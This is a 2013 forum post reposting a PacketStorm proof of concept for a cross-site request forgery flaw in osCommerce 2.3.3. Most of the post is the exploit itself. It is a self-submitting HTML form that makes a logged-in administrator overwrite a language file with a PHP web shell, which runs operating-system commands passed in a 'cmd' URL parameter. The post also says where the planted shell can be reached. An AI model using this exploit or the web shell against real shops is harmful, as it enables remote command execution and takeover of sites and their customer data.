Praetorian503 Posted February 12, 2013 Report Share Posted February 12, 2013 osCommerce version 2.3.3 suffers from a cross site request forgery vulnerability.<?php /* * this is simple proof-of-c0ncept for csrf in latestosCommerce (2.3.3). * * Admin, after visiting this page, will add php-shell-code to file: * ./catalog/includes/languages/english/download.php, so now if we * add 'cmd' param to this file, our 'shell' will print command output. * * --- there should be more this kind of bugs in this webapp. * 22.o1.2o13 o/ */?><html><body onload="document.runCSRF.submit();"><form method="post" name="runCSRF"action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save"><input type="hidden" name="file_contents"value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>"></form>your shell should be here:catalog/includes/languages/english/download.php?cmd=id<br></body></html>Source: PacketStorm Quote Link to comment Share on other sites More sharing options...